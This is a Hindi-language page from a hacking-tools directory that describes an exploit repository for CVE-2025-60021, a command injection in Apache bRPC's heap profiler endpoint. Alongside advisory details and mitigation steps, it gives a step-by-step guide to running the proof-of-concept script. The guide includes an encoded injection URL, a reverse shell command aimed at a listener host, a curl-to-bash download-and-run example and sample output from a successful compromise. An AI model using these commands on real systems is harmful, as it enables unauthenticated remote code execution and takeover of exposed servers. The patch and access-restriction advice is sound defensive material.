Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Ashwesker-CVE-2025-60021 — CVE-2025-60021 | Kitploit
उपकरण/GitHubGitHub/mefhika120/ashwesker-cve-2025-60021
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubmefhika120/ashwesker-cve-2025-60021

Ashwesker-CVE-2025-60021

CVE-2025-60021

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛑 CVE-2025-60021 — Apache bRPC रिमोट कमांड इंजेक्शन

G_GmijOXQAAX5iE

📌 अवलोकन

CVE-2025-60021 Apache bRPC के 1.15.0 से पहले के संस्करणों में हीप प्रोफाइलर बिल्ट-इन सेवा (/pprof/heap) में पाई जाने वाली एक गंभीर रिमोट कमांड इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण वाले हमलावरों को मनमाने OS कमांड चलाने की अनुमति देती है। (NVD)


🔓 भेद्यता विवरण

विशेषताजानकारी
नाम / आईडीCVE-2025-60021
उत्पादApache bRPC (सभी प्लेटफ़ॉर्म)
प्रभावित संस्करण< 1.15.0
प्रकाशन तिथि16 Jan 2026 (NVD)
भेद्यता प्रकाररिमोट कमांड इंजेक्शन (CWE-77) (NVD)
एंडपॉइंट/pprof/heap
ट्रिगरअस्वच्छित extra_options पैरामीटर
मूल कारणOS कमांड के रूप में निष्पादित करने से पहले इनपुट मान्य नहीं किया जाता (openwall.com)

❗हमलावर केवल इस प्रोफाइलिंग पैरामीटर में हेरफेर करके दूरस्थ रूप से कमांड इंजेक्ट कर सकते हैं।


🚨 गंभीरता और जोखिम

🔥 गंभीरता रेटिंग: क्रिटिकल 📊 CVSS v3.1 बेस स्कोर: 9.8 / 10 वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (INCIBE)

👉 इसका मतलब है कि हमलावर बिना लॉगिन के दूरस्थ रूप से मनमाने कमांड निष्पादित कर सकते हैं — उजागर सेवाओं के लिए सबसे खराब स्थिति।


🧠 तकनीकी विवरण

🔍 यह कैसे काम करता है

  1. हीप प्रोफाइलर एक्सपोज़र: bRPC मेमोरी विश्लेषण (jemalloc) के लिए एक प्रोफाइलिंग एंडपॉइंट (/pprof/heap) उजागर करता है। (openwall.com)
  2. इनपुट हैंडलिंग बग: एंडपॉइंट एक extra_options पैरामीटर स्वीकार करता है। इसे सैनिटाइज़ करने के बजाय, bRPC इसे सीधे OS शेल को पास करता है। (openwall.com)
  3. कमांड इंजेक्शन: एक दुर्भावनापूर्ण अभिनेता सिस्टम कमांड सहित इनपुट तैयार करता है → सेवा उन्हें निष्पादित करती है। (CVE Details)

CVE-2025-60021 PoC स्क्रिप्ट का उपयोग करने की चरण-दर-चरण मार्गदर्शिका

यह मानता है कि आपके पास स्क्रिप्ट CVE-2025-60021.py के रूप में सहेजी गई है (भले ही असली CVE 2025-60021 है—आप इसे नाम बदलने के लिए स्वतंत्र हैं)। यह Apache bRPC के हीप प्रोफाइलर में रिमोट कमांड इंजेक्शन भेद्यता प्रदर्शित करने के लिए एक Python 3 स्क्रिप्ट है। इसे केवल उन्हीं सिस्टम पर चलाएँ जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है—अनधिकृत शोषण अवैध है।

पूर्वापेक्षाएँ

  1. Python वातावरण: सुनिश्चित करें कि आपके पास Python 3 स्थापित है (जैसे, 3.6+)। स्क्रिप्ट बिल्ट-इन मॉड्यूल के साथ-साथ requests और argparse का उपयोग करती है (जो मानक हैं या स्थापित करने में आसान हैं)।

  2. निर्भरताएँ स्थापित करें: यदि पहले से मौजूद नहीं हैं, तो requests लाइब्रेरी स्थापित करें:

    root@kitploit:~
    pip install requests
    
  3. लक्ष्य सेटअप: आपको एक भेद्य Apache bRPC सर्वर की आवश्यकता है:

    • संस्करण < 1.15.0.
    • हीप प्रोफाइलर सक्षम (सर्वर कॉन्फ़िग देखें; यह अक्सर dev सेटअप में डिफ़ॉल्ट रूप से चालू होता है)।
    • नेटवर्क पर सुलभ (जैसे, http://localhost:8060 या एक रिमोट IP/पोर्ट)। स्थानीय रूप से परीक्षण करते समय, एक भेद्य bRPC इंस्टेंस सेट करें (जैसे, Docker या सोर्स बिल्ड के माध्यम से—Apache bRPC दस्तावेज़ देखें)।
  4. अनुमतियाँ: केवल नेटवर्क एक्सेस या विशेषाधिकारों के लिए आवश्यक होने पर sudo के साथ चलाएँ; अन्यथा, सादा python3 पर्याप्त है।

चरण 1: स्क्रिप्ट सहेजें

मैंने पहले जो PoC कोड दिया था उसे CVE-2025-60021.py नामक फ़ाइल में कॉपी करें। चाहें तो इसे निष्पादन योग्य बनाएँ:

root@kitploit:~
chmod +x CVE-2025-60021.py

चरण 2: तर्कों को समझें

स्क्रिप्ट दो आवश्यक स्थितीय तर्क लेती है:

  • target: भेद्य bRPC सर्वर का URL (जैसे, http://192.168.1.100:8060 या http://targets:8060—स्कीम गायब या अमान्य होस्ट जैसी टाइपो त्रुटियाँ ठीक करें)।
  • cmd: लक्ष्य पर निष्पादित करने के लिए कमांड (जैसे, उपयोगकर्ता जानकारी के लिए "id", या रिवर्स शेल के लिए "curl http://your-server/reverse-shell.sh | bash" जैसी अधिक जटिल चीज़)। कई कमांड जोड़ने के लिए && या ; का उपयोग करें।

चरण 3: स्क्रिप्ट चलाएँ

एक टर्मिनल खोलें (जैसे, Kali Linux में जैसा आप उपयोग कर रहे हैं) और इसे अपने लक्ष्य और कमांड के साथ निष्पादित करें। उदाहरण कमांड:

  • बुनियादी परीक्षण (सिस्टम जानकारी प्राप्त करें):

    root@kitploit:~
    sudo python3 CVE-2025-60021.py http://targets:8060 "id && whoami && uname -a"
    
  • रिवर्स शेल उदाहरण (your-listener-ip और पोर्ट बदलें; पहले nc -lvnp 4444 जैसा लिसनर सेट करें):

    root@kitploit:~
    sudo python3 CVE-2025-60021.py http://targets:8060 "bash -i >& /dev/tcp/your-listener-ip/4444 0>&1"
    
  • यदि HTTPS या भिन्न पोर्ट का उपयोग कर रहे हैं, तो URL को तदनुसार समायोजित करें (जैसे, https://target:443—स्क्रिप्ट इसे संभालती है, लेकिन सर्टिफिकेट समस्या होने पर --insecure जोड़ें)।

चरण 4: आउटपुट की व्याख्या करें

सफलता संकेतक:

  • शोषण संभवतः सफल रहा! (200 OK)
  • प्रतिक्रिया निकाय में संभावित कमांड आउटपुट (जैसे, यदि उसने id चलाया तो uid=0(root)...)।
  • बिना आउटपुट वाले कमांड (जैसे, फ़ाइल लेखन या शेल) के लिए, लक्ष्य सर्वर (लॉग, प्रोसेस) या अपने लिसनर की जाँच करें।

विफलता संकेतक (जैसा आपने देखा):

  • स्टेटस कोड 404 मिला - शायद भेद्य नहीं?"
  • "[E1002] Heap profiler is not enabled" जैसे त्रुटि संदेश का मतलब है कि एंडपॉइंट सक्रिय नहीं है—इसे लक्ष्य पर सक्षम करें या कोई भिन्न भेद्य इंस्टेंस खोजें।
  • टाइमआउट या कनेक्शन त्रुटियाँ: लक्ष्य अप्राप्य है, फ़ायरवॉल ब्लॉक कर रहा है, या गलत पोर्ट।
  • यदि कोई आउटपुट लीक नहीं होता, तो कमांड अभी भी सर्वर पर चुपचाप चलती है।

चरण 5: सामान्य समस्याओं का समाधान

  • 404 त्रुटि: हीप प्रोफाइलर अक्षम है। इसे bRPC कॉन्फ़िग में सक्षम करें (जैसे, --enable_heap_profiler=true) और सर्वर को पुनः प्रारंभ करें।
  • Argparse त्रुटि: cmd तर्क भूल गए—इसे हमेशा शामिल करें।
  • कोई प्रतिक्रिया निकाय आउटपुट नहीं: कुछ कमांड stdout उत्पन्न नहीं करते। ऐसे कमांड का उपयोग करें जो करते हैं (जैसे, echo "test" > /tmp/proof.txt) और लक्ष्य पर फ़ाइल की जाँच करें।
  • विशेषाधिकार: यदि bRPC प्रक्रिया गैर-root के रूप में चलती है, तो कमांड उस उपयोगकर्ता की अनुमतियों तक सीमित होती हैं।
  • पेलोड समायोजन: यदि ; काम नहीं करता, तो जोड़ने के लिए && या | आज़माएँ। आवश्यकता होने पर विशेष वर्णों को URL-एन्कोड करें (स्क्रिप्ट अधिकांश को संभालती है)।
  • स्थानीय परीक्षण: वास्तविक सिस्टम को जोखिम में डाले बिना सत्यापित करने के लिए bRPC के लिए एक भेद्य Docker कंटेनर चालू करें।

चरण 6: सफ़ाई और नैतिक नोट

  • परीक्षण के बाद, लक्ष्य को पैच करें: bRPC 1.15.0+ में अपग्रेड करें या /pprof/heap अक्षम करें।
  • किसी भी आर्टिफैक्ट (जैसे, बनाई गई शेल या फ़ाइलें) को हटा दें।
  • यदि पेंटेस्टिंग कर रहे हैं, तो अनुपालन के लिए अपने परीक्षणों को लॉग करें।

यदि शोषण किसी भेद्य लक्ष्य पर सफल रहा (जैसे, हीप प्रोफाइलर सक्षम, अनपैच किया हुआ bRPC <1.15.0), तो आपके टर्मिनल में आउटपुट कुछ इस प्रकार दिखेगा (सटीक विवरण कमांड के stdout और सर्वर कॉन्फ़िग पर निर्भर करता है):

root@kitploit:~
[*] Sending payload to: http://targets:8060/pprof/heap?extra_options=%3B+id+%26%26+whoami+%26%26+uname+-a+%23
[*] Executing command: id && whoami && uname -a
[+] Exploit likely succeeded! (200 OK)
[+] Check your listener / server logs for output

Response body (possible command output):

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
user
Linux target-host 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-29) x86_64 GNU/Linux

[followed by heap profile data or binary-ish output from jemalloc, like memory stats or a dump]

मुख्य संकेत: 200 OK स्थिति, और यदि आपका कमांड (id && whoami && uname -a जैसा) आउटपुट उत्पन्न करता है, तो वह प्रतिक्रिया निकाय में दिखाई दे सकता है (प्रोफाइलर डेटा के साथ मिश्रित)। मूक कमांड (जैसे, रिवर्स शेल) के लिए, गतिविधि के लिए लक्ष्य सर्वर या अपने लिसनर की जाँच करें—200 के अलावा कोई सीधी टर्मिनल पुष्टि नहीं होती। 😈


🛠 शमन और सुधार

✅ प्राथमिक समाधान

  • 👉 Apache bRPC को संस्करण 1.15.0 या बाद के में अपग्रेड करें। (NVD)

🧩 वैकल्पिक सुधार

  • 🛠 Apache bRPC GitHub रिपॉजिटरी (पुल रिक्वेस्ट #3101) से आधिकारिक पैच मैन्युअल रूप से लागू करें। (openwall.com)

🔒 अतिरिक्त सुरक्षाएँ

  • फ़ायरवॉल / ACLs: अविश्वसनीय नेटवर्क से /pprof/heap तक पहुँच अवरुद्ध करें।
  • प्रोफाइलिंग अक्षम करें: जहाँ आवश्यक न हो वहाँ हीप प्रोफाइलिंग बंद कर दें।
  • लॉग की निगरानी करें: असामान्य प्रोफाइलर गतिविधि पर नज़र रखें।

💡 यह खतरनाक क्यों है

✔ हमलावरों को क्रेडेंशियल की आवश्यकता नहीं होती। ✔ यह नेटवर्क पर काम करता है। ✔ यह भेद्य bRPC का उपयोग करने वाले सभी प्लेटफ़ॉर्म को प्रभावित करता है। ✔ यह पूर्ण सिस्टम समझौते का कारण बन सकता है।

महत्वपूर्ण सेवाओं (जैसे, खोज, स्टोरेज, मशीन लर्निंग पाइपलाइन) के लिए bRPC का उपयोग करने वाले व्यवसाय विशेष रूप से जोखिम में हैं क्योंकि यह दोष एक डायग्नोस्टिक टूल को हमले के वेक्टर में बदल देता है। (Daily CyberSecurity)


🧾 अतिरिक्त नोट

⚠ EPSS (शोषण पूर्वानुमान): कुछ फ़ीड अब तक कम शोषण अवलोकन का संकेत देते हैं, लेकिन शोषण में आसानी का मतलब है कि इसे वास्तविक हमलों में तेज़ी से इस्तेमाल किया जा सकता है। (Tenable®)

📌 वर्गीकरण: CWE-77 — कमांड में विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन (कमांड इंजेक्शन)। (NVD)


📎 संदर्भ

  • NIST/NVD CVE-2025-60021 के लिए भेद्यता प्रविष्टि (NVD)
  • Apache और Openwall सुरक्षा सलाह विवरण (openwall.com)
  • INCIBE-CERT CVSS और मेट्रिक्स विवरण (INCIBE)
  • CVE Details अवलोकन (प्रभावित संस्करण और सुधार मार्गदर्शन) (CVE Details)

यदि आप प्रोडक्शन में Apache bRPC चला रहे हैं — तुरंत पैच करें और जोखिम कम करने के लिए डायग्नोस्टिक एंडपॉइंट्स तक पहुँच प्रतिबंधित करें।

टूल डाउनलोड करें
प्रभाव श्रेणीप्रभाव
गोपनीयताउच्च
अखंडताउच्च
उपलब्धताउच्च
हमला वेक्टरनेटवर्क
विशेषाधिकारकोई आवश्यक नहीं
उपयोगकर्ता सहभागिताकोई आवश्यक नहीं(INCIBE)